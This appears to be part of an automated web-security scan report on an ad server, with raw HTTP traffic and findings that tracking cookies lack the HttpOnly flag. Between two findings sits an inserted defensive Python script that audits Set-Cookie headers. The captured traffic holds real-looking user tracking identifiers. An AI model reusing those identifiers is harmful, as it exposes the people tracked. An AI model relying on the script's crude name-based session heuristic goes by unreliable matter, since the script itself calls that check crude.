GET /iframe3?7DlEAJUeFQAKf3sAAAAAACSrHgAAAAAAAgAAAAQAAAAAAP8AAAACCtSXIQAAAAAAO1ciAAAAAABSbigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvfA0AAAAAAAIAAwAAAAAAPQrXo3A9.j.NzMzMzEwoQM3MzMzMzABAAAAAAAAAK0DNzMzMzMwAQAAAAAAAACtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANvP6S5dcQCvvERZXEb1jB5Wo9UMMB68IBgYBOAAAAAA==,,http%3A%2F%2Fwww.surphace.com%2Fads%2Frubicon_orlandosentinel,Z%3D468x60%26s%3D1384085%26_salt%3D2430113711%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.surphace.com%252Fads%252Frubicon_orlandosentinel%26r%3D0,a481febc-7a44-11e0-9004-734ea9a602b1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=468x60&section=1384085
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:11 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0313.rm.bf1
Set-Cookie: ih="b!!!!@!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!024(!!!!#<ypnC!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; path=/; expires=Wed, 08-May-2013 14:00:11 GMT
Set-Cookie: vuday1=qtDL:!1e0g7s@DV; path=/; expires=Tue, 10-May-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!$!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!*:n8!$8TB!024(!%:2h!!!!$!?5%!%5F4/!wDW,!%Ua]!%]N-!'>cc~~~~~<ypnC=!oT]~"; path=/; expires=Wed, 08-May-2013 14:00:11 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: lifb=>MqpcP`!q)8ZvPC; path=/; expires=Mon, 09-May-2011 16:00:11 GMT
Cache-Control: no-store
Last-Modified: Mon, 09 May 2011 14:00:11 GMT
Pragma: no-cache
Content-Length: 3250
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(8093450);}
</script><iframe src="htt
...[SNIP]...

10.12. http://ad.yieldmanager.com/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: BX (see the Set-Cookie header in the response below). Without HttpOnly the value is exposed to document.cookie, so any script running in the ad.yieldmanager.com origin can read it. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp?Z=468x60&s=1384085&_salt=2430113711&B=10&u=http%3A%2F%2Fwww.surphace.com%2Fads%2Frubicon_orlandosentinel&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=468x60&section=1384085
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!-!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<y-(rM.jTN!!L7_!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<yjn9M.jTN!#mP:!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mP>!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPA!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPD!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPG!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPJ!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#p!r!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<xtrb!!.vL"; ih="b!!!!?!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; 
bh="b!!!%/!!!?H!!!!%<wR0_!!*oY!!!!'<ypn'!!-?2!!!!-<ypn'!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!(<ypn'!!0O4!!!!)<y]81!!0O<!!!!/<y]81!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!/<y]81!!J<E!!!!/<y]81!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!(<ypn'!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!%<ypn'!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!0<y]81!!q:E!!!!-<y]81!!q<+!!!!.<y]81!!q</!!!!.<y]81!!q<3!!!!.<y]81!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!(<ypn'!!ucq!!!!/<y]81!!vRm!!!!)<y]81!!vRq!!!!)<y]81!!vRr!!!!)<y]81!!vRw!!!!/<y]81!!vRx!!!!)<y]81!!vRy!!!!)<y]81!!w3l!!!!(<ypn'!!wQ3!!!!(<ypn'!!wQ5!!!!(<ypn'!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!)<y]81!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!%<ypn'!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2XY!!!!)<y]8:!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!)<y]81!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!)<y]81!#7.'!!!!)<y]81!#7.:!!!!)<y]81!#7.O!!!!)<y]81!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!)<y]81!#MTF!!!!)<y]81!#MTH!!!!)<y]81!#MTI!!!!)<y]81!#MTJ!!!!)<y]81!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#N45!!!!#<xr]M!#O29!!!!%<ypn'!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!/<y]81!#SF3!!!!/<y]81!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!)<y]81!#UDP!!!!/<y]81!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#Z8A!!!!%<ypn'!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]@s!!!!%<whqH!#]Z!!!!!%<ypn'!#^@9!!!!#
<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#`-7!!!!%<ypn'!#`S2!!!!(<ypn'!#`U0!!!!'<ypn'!#`U9!!!!%<ypn'!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!'<ypn'!#a=7!!!!'<ypn'!#a=9!!!!'<ypn'!#a=P!!!!'<ypn'!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!)<y]81!#ai7!!!!)<y]81!#ai?!!!!)<y]81!#b:Z!!!!#<x2wq!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!%<ypn'!#c8W!!!!%<ypn'!#c8X!!!!%<ypn'!#c8]!!!!%<ypn'!#c?c!!!!)<y]81!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e9?!!!!#<y,`,!#eLS!!!!#<yjEE!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!%<ypn'!#fG+!!!!'<ypn'!#g=!!!!!%<ypn'!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr!!!!#<x2wq!#h.N!!!!#<yMiw!#k]4!!!!#<x2wq!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ne_!!!!%<ypn'!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!)<y]81!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!)<y]81!#tM)!!!!)<y]81!#tn2!!!!)<y]81!#uE=!!!!#<x9#K!#uJY!!!!/<y]81!#uR3!!!!%<ypn'!#ujQ!!!!%<ypn'!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!)<y]81!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!,<y]81!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:w!!!!#<x2wq!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!$<ypn'!$#R7!!!!)<y]81!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!)<y]81!$(!P!!!!(<ypn'!$(+N!!!!#<wGkB!$(Gt!!!!,<y]81!$(S9!!!!%<ypn'!$(Tb!!!!#<yQLc!$(V0!!!!%<y*E<!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)DI!!!!#<x2wq!$)GB!!!!(<ypn'!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q
!$*hf!!!!%<ypn'"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:10 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0363.rm.bf1
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 09 May 2011 14:00:10 GMT
Pragma: no-cache
Content-Length: 927
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<iframe allowtransparency=\"true\" scrolling=\"no\" marginwidth=\"0\" marginheight=\"0\" frameborder=\"0\" height=\"60\" width=\"468\" src=\"http://ad.yieldmanager.com/iframe3?7DlEAJUe
...[SNIP]...
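
The HttpOnly check reported above is mechanical enough to reproduce. The following Python script is an added example, not part of the scanner output or of the ad network's code: it parses raw Set-Cookie headers, flags any cookie missing HttpOnly or Secure, and applies a simple name-based heuristic for "looks like a session token", which is an assumption standing in for the scanner's own undocumented heuristic. The sample headers are the BX, vuday1 and lifb lines from the ad.yieldmanager.com responses in this report, plus one constructed PHPSESSID cookie (not from the report) for contrast.

```python
import re
from dataclasses import dataclass, field

# Name fragments that commonly mark a session cookie. This is an assumption
# made for the example, not the scanner's own "session token" heuristic.
SESSION_NAME_RE = re.compile(r"sess|sid|token|auth|login", re.IGNORECASE)


@dataclass
class Cookie:
    name: str
    value: str
    attrs: dict = field(default_factory=dict)  # lower-cased attribute -> value

    @property
    def httponly(self) -> bool:
        return "httponly" in self.attrs

    @property
    def secure(self) -> bool:
        return "secure" in self.attrs

    @property
    def persistent(self) -> bool:
        return "expires" in self.attrs or "max-age" in self.attrs

    @property
    def looks_like_session(self) -> bool:
        return bool(SESSION_NAME_RE.search(self.name))


def parse_set_cookie(header: str) -> Cookie:
    """Parse one Set-Cookie header into name, value and attribute flags.

    The cookie-pair ends at the first ';' outside double quotes; the bh/ih/pv1
    values in this report are quoted and use an opaque character set, so the
    split must respect the quotes rather than blindly splitting on ';'.
    """
    header = header.strip()
    if header.lower().startswith("set-cookie:"):
        header = header.split(":", 1)[1].strip()
    in_quotes = False
    end = len(header)
    for i, ch in enumerate(header):
        if ch == '"':
            in_quotes = not in_quotes
        elif ch == ";" and not in_quotes:
            end = i
            break
    name, _, value = header[:end].partition("=")
    attrs = {}
    for part in header[end + 1:].split(";"):
        key, _, val = part.strip().partition("=")
        if key:
            attrs[key.lower()] = val.strip()
    return Cookie(name.strip(), value.strip(), attrs)


def audit(headers):
    """Return one (name, issues) tuple per header, mirroring the report's
    'missing HttpOnly' finding and its session-token caveat."""
    results = []
    for header in headers:
        c = parse_set_cookie(header)
        issues = []
        if not c.httponly:
            issues.append("no HttpOnly: readable via document.cookie by any script in the origin")
        if not c.secure:
            issues.append("no Secure: also sent over plain HTTP")
        if issues and c.looks_like_session:
            issues.append("name suggests a session token: treat as high risk")
        elif issues and c.persistent:
            issues.append("persistent identifier: lower risk, review its function")
        results.append((c.name, issues))
    return results


# Set-Cookie headers copied from the ad.yieldmanager.com responses in this
# report, plus one constructed session cookie (not from the report).
SAMPLE_HEADERS = [
    'Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT',
    'Set-Cookie: vuday1=qtDL:!1e0g7s@DV; path=/; expires=Tue, 10-May-2011 00:00:00 GMT',
    'Set-Cookie: lifb=>MqpcP`!q)8ZvPC; path=/; expires=Mon, 09-May-2011 16:00:11 GMT',
    'Set-Cookie: PHPSESSID=constructed0123; Path=/; HttpOnly; Secure',
]

if __name__ == "__main__":
    for name, issues in audit(SAMPLE_HEADERS):
        print(name, "->", "; ".join(issues) or "ok")
```

Run as-is it reports the three ad-network cookies as lacking both flags and the constructed PHPSESSID as clean. The name heuristic is deliberately crude; for a real review, inspect what the value is used for server-side, since an opaque value such as BX can still be a stable cross-site identifier even if it is not a login session.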

10.13. http://ad.yieldmanager.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: bh and BX (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1274605&id=56918&id=315889&id=715901&id=1023315&id=725071&id=1268392&id=1198035&id=1049794&id=1238051&id=74560&id=593881&id=1264419&id=86237&id=926097&id=1006089&id=1196051&id=1147048&id=1086731&id=1284585&id=1086733&id=1044410&id=1093100&id=1063912&id=397181&id=1044578&id=1063916&id=1041270&id=1049769&id=1049770&id=596293&id=576685&id=1044587&id=596291&id=1049772&id=1063911&id=1063910&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!-!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<y-(rM.jTN!!L7_!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<yjn9M.jTN!#mP:!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mP>!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPA!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPD!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPG!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPJ!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#p!r!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<xtrb!!.vL"; ih="b!!!!?!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; 
bh="b!!!%0!!!?H!!!!%<wR0_!!*oY!!!!%<yjL@!!-?2!!!!,<yjL@!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!'<yjL@!!0O4!!!!)<y]81!!0O<!!!!/<y]81!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!/<y]81!!J<E!!!!/<y]81!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!'<yjL@!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!$<yjL@!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!0<y]81!!q:E!!!!-<y]81!!q<+!!!!.<y]81!!q</!!!!.<y]81!!q<3!!!!.<y]81!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!'<yjL@!!ucq!!!!/<y]81!!vRm!!!!)<y]81!!vRq!!!!)<y]81!!vRr!!!!)<y]81!!vRw!!!!/<y]81!!vRx!!!!)<y]81!!vRy!!!!)<y]81!!w3l!!!!'<yjL@!!wQ3!!!!'<yjL@!!wQ5!!!!'<yjL@!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!)<y]81!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!$<yjL@!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2XY!!!!)<y]8:!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3_i~~!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!)<y]81!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!)<y]81!#7.'!!!!)<y]81!#7.:!!!!)<y]81!#7.O!!!!)<y]81!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!)<y]81!#MTF!!!!)<y]81!#MTH!!!!)<y]81!#MTI!!!!)<y]81!#MTJ!!!!)<y]81!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#N45!!!!#<xr]M!#O29!!!!$<yjL@!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!/<y]81!#SF3!!!!/<y]81!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!)<y]81!#UDP!!!!/<y]81!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#Z8A!!!!$<yjL@!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]@s!!!!%<whqH!#]Z!!!!!$<yjL@!#^
@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#`-7!!!!$<yjL@!#`S2!!!!'<yjL@!#`U0!!!!%<yjL@!#`U9!!!!$<yjL@!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!%<yjL@!#a=7!!!!%<yjL@!#a=9!!!!%<yjL@!#a=P!!!!%<yjL@!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!)<y]81!#ai7!!!!)<y]81!#ai?!!!!)<y]81!#b:Z!!!!#<x2wq!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!$<yjL@!#c8W!!!!$<yjL@!#c8X!!!!$<yjL@!#c8]!!!!$<yjL@!#c?c!!!!)<y]81!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e9?!!!!#<y,`,!#eLS!!!!#<yjEE!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!$<yjL@!#fG+!!!!%<yjL@!#g=!!!!!$<yjL@!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr!!!!#<x2wq!#h.N!!!!#<yMiw!#k]4!!!!#<x2wq!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ne_!!!!$<yjL@!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!)<y]81!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!)<y]81!#tM)!!!!)<y]81!#tn2!!!!)<y]81!#uE=!!!!#<x9#K!#uJY!!!!/<y]81!#uR3!!!!$<yjL@!#ujQ!!!!$<yjL@!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2w